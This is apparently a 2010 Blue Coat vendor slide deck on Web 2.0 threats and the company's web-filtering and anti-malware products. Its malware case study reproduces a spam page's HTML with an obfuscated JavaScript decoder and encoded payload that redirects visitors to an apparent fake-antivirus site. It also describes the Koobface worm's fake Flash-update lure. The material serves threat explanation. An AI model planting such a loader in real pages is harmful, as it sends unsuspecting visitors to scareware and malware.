Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service

Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners.

© Blue Coat Systems, Inc. 2010. All Rights Reserved.

Living in a Web 2.0World(and howBCSI canhelp!)

Mark StanfordSE Manager

20110 Ashbrook Place, Suite 275Ashburn, VA 20147(703) 857-2100www.geobridge.net


Agenda

Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples BCSI countermeasures: Layered Security Defenses


Applications& Services

Technologies & Programming Languages

Software &Systems

What is Web 2.0?


Web Evolution

4

Interactive Pages

Community Model

Multi-Host Pages

Static Pages

Dynamic Pages

Publishing Model

Single Host Pages

Nice to Have Must Have

Dynamic Pages


Cyber Crime Evolution

5

Invisible

Data Collection/Identity

Profit Driven

Wide-spread, Fast

Visible, DoS

Damage/Defacement

Ingenuity/Pride Driven

Amateurs Professionals

Targeted


Web 2.0

Did NOT change…

the OSI model

the way IP addresses work

the way URLs are handled

the way Web Filtering works

DID change…

how information gets posted, even legitimate sites

how information may be presented

By 2012 the Internet will be 75X larger than in 2002

What is required to find/identify threats on the web

6


Web 2.0 Also Means 1 URL Leads to Many

12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time)

12 Domains, 246 URLs(www.bild.de, 31.03.2010, 10:17 a.m. German Time)

7

http://www.cnn.com/

http://www.bild.de/


Web 2.0 and Search Engines

8

www Search Engine View

ForumsBlogsWikisGuestbooks

http://images.google.com/imgres?imgurl=http://www.mediabistro.com/fishbowlLA/original/Fist%20of%20Money.gif&imgrefurl=http://www.mediabistro.com/fishbowlLA/show_business/&usg=__IF4qaJDnaIqhdEXCM8NLyeISnVM=&h=365&w=327&sz=6&hl=en&start=18&tbnid=rX_VzMlaZxnX8M:&tbnh=121&tbnw=108&prev=/images?q=money&gbv=2&hl=en&safe=off

http://images.google.com/imgres?imgurl=http://www.dailyclipart.net/wp-content/uploads/medium/clipart0020.jpg&imgrefurl=http://www.dailyclipart.net/clipart/category/dog-clip-art/&usg=__JQyyFPN4_cRfQwsfYd4ORp-rgXw=&h=261&w=340&sz=15&hl=en&start=2&um=1&tbnid=aTe6j59QDsRDLM:&tbnh=91&tbnw=119&prev=/images?q=dog&imgtype=clipart&as_st=y&hl=en&safe=off&sa=N&um=1

http://images.google.com/imgres?imgurl=http://z.about.com/d/webclipart/1/0/g/N/4/manwo6.gif&imgrefurl=http://webclipart.about.com/library/apeople/blmanwo4.htm&usg=__tyTkLjwrG1wnVf2LDpT8SjlSjFY=&h=197&w=285&sz=23&hl=en&start=3&um=1&tbnid=jjBPSgk3tG18oM:&tbnh=79&tbnw=115&prev=/images?q=group+of+people&imgtype=clipart&as_st=y&hl=en&safe=off&um=1

© Blue Coat Systems, Inc. 2010. All Rights Reserved.9


Malware Case Study


WebPulse saw a new referrer…

11

WebPulse



Nothing here…

13

<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746>

<style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3>install clear xbox controller install remove lexus power window audio install honda civic 2007 ex install linux suse on new computer install electronic diary install cs3 in vista install warehouse shelving hp deskjet 5550 install software valve relief chevy piston install install patrol air filter no install lock folders how to install mailbox garage door have vb setup install jmail axle install hellwig ghetto install s forum apron front sink install tiger wood install install cobra fatty freeway bars plasma install adaptec tape install remote install software cnps 9500 install install modular plug rj45 can't install program how to install neon tubes how to install themes for mac 2003 install microsoft office msdos install system software install through active directory install vcr to dish network nero startsmart install error blat install syntax dell workstation 360n install cpu install setup install tunnel protectors project 2007 how to install self install fire pit install grub dual boot deluxe install prizm pro how to install a window shutter install laminate over existing counter top linksys 54g install


So… How did the User get there?

14



Interesting…

16

<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746><script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1');</script><style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3>install clear xbox controller install remove lexus power window audio install honda civic 2007 ex install linux suse on new computer install electronic diary install cs3 in vista install warehouse shelving hp deskjet 5550 install software valve relief chevy piston install install patrol air filter no install lock folders how to install mailbox garage door function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));}</script>

<script>document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169";</script>


“A friendly piece of advice…”

17


“You are in trouble…”

18


“This is very serious”

19




Web 2.0 Examples - Twitter

Still a toy or already a tool?


Web 2.0 Examples - Mashups


Web 2.0 Examples - Facebook

Still a toy or already a tool?


Koobface worm (January 2009)

Invitation to click on a link in Facebook or Myspace in-box

Supposedly link to a funny video Users where told that they have to update their flash

player to view the video The installed SW was a proxy server Now selected traffic could be redirected to the attacker A second program to download and install arbitrary code

was installed, too

Like magic, the infected computer is now a zombie, under the control of unknown villains


Changing Web Habits

26

Top 10 Categories – 2009WebFilter/WebPulse, 62M+ Users

1. Social Networking2. Web Advertisements3. Search Engines/Portals4. Personals/Dating5. Pornography6. Computers/Internet7. Audio/Video Clips8. Adult/Mature Content9. Web Email10. Illegal/Questionable

Social Networking Moved to #1 from #2 position Represents 25% of Top10 requests

Web Email Dropped to #9 from #5 position Users migrating to social networking

Cyber Crime Leverages Search engine poisoning Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams


Layered Security Defenses


Blue Coat Layered Defenses

Cloud ServiceWebPulse & WebFilter

Inline Threat DetectionProxyAV

Web Application & Content Controls ProxySG

Integrated Data Loss PreventionProxySG with 6 DLP partners

Remote Users ProxyClient

28


Hybrid Design

Architected to Deliver On-Demand Security Intelligence

WAN

Industry’s leading collaborative cloud defense with 62M usersReal-time inputs of any new web content and dynamic linksWeb protection, visibility, and reporting in any location

ProxySG & ProxyAV

WebFilter

WebPulse

ProxyClientRemote Users

Web Gateway Protection Inline threat analysis w/SSL Web filtering & content controls Media optimization + B/W Mgmt

Cloud Defenses Real-time web content ratings Web threat & malware detection Reputation ratings

URL Filtering & ReportingCloud threat protection

Reporter

Web


Blue Coat Secure Web Gateway

30

MalwareScanning

ProtocolCompliance

ContentFilters

DataTypes

ActiveContent

`

URLFiltering

AAAPolicy

CertificateValidation

MethodControls

BCWF

WebPulse

Reporter

Log Files

ObjectCache

BandwidthManagement

ProtocolOptimization

ProxyAV:- Behavior based analysis- Signatures


Preserve Productivity

BCWF Malware Identification StrategyDynamic Link Analysis

A. Popular Web Site Pointers

B. Middle Relay Servers & Link Farms

C. Malware Download Hosts

31

A B C


Dynamic Link Analysis

Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL chain for threats & rating Update master database in cloud to protect all members

32

Cloud Community



Cloud connected community that is broad and diverseReal-time input of new web links to the cloud service Immediate analysis of URL for threats & rating Update master database in cloud to protect all members

33

Cloud Community



Cloud connected community that is broad and diverse Real-time input of new web links to the cloud serviceImmediate analysis of URL for threats & rating Update master database in cloud to protect all members

34

Cloud Community



Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of URL for threats & ratingUpdate master database in cloud to protect all members

35

Cloud Community



Cloud connected community that is broad and diverse Real-time input of new web links to the cloud service Immediate analysis of full link chain for threats & rating Update master database in cloud to protect all members

36

Protects

Web Gateways

Remote Users

Cloud Community


WebPulse: First Complete DLA solution

New defense layer Full Dynamic link analysis Foundation for next generation URL filtering Fast, Aware, Protective… for anyone, anywhere

37

Protects

Web Gateways

Remote Users

Cloud CommunityWebPulse62M Users

WebFilter2B reqs/week

ProxySG

ProxyClientK9


K-9 Web ProtectProxyClientProxySG ProxyAV

BCWF Full ListBCWF Full List

• 16 Sources• Signatures• Behavior • Heuristics • Reputation• Sandboxing

Threat Analysis

Deep Background Rating Analysis (DBRA)• 2 Secs – 2hrs• RTT Balanced

URL Malware

• “Uncategorized” sent to WebPulse for

Dynamic categorization • 62M+ User Community • 45B+ requests/week• Fully Configurable and Secure• 5 Min for security updates

Rating Servers• 300M Unique requests

daily• 1.2B requests “rated”

weekly• 50 languages• Fast (ms) – try it!

Real Time Boundary

WebPulse Clients

WebPulse Cloud Service

DynamicURL Cache

DynamicURL Cache

DynamicURL Cache

URL & Content Trainers

ANZ

Master Rating Database VA

CA

HK

UK

http://drtr.test.cwfservice.net/proxy/www.stanford.edu












ProxyAV: Co-Processor Architecture

Improved utilization with M:N ratio Higher throughput per gateway Results in less hardware (with new AV HW: always 1 SG –

1 AV sizing possible)

Optimized design

39

EnterpriseNetwork

Internet

ProxySG

ProxyAV

Clean Object Cache

Finger Print Cache

Dual Cache Design

• Patience Page • Trickle First• Trickle Last • Defer Scan (media)

ICAP, ICAP+, S-ICAP


ProxyAV – anti-malware features

Don’t get confused by the name “AV” Anti-malware features are more comprehensive then

traditional pattern matching technologies• Behavioral analysis

• Sandboxing

• Heuristics

• True file type detection

• Etc.

ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249)Note: Finjan was not able to block the exploit without a

security update

It is a different approach and philosophy


ProxyClient included with WebFilter

Remote Filtering Cloud Connected Threat Protection Acceleration Central Policy Reporting

41


Why Blue Coat Products? Unmatched policy controls & authentication options Proactive Malware/MMC detection Real-time web content analysis/DLA for gateway & client URL database, threat detection, and DLP partners Custom object-based OS with patented cache

technologies Broad proxy library & acceleration techniques Bandwidth management & protocol

optimization/compliance Experience, Reliability, Performance

42

All the RIGHT parts!

Blue Coat Confidential Information


Questions?

Documents

Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service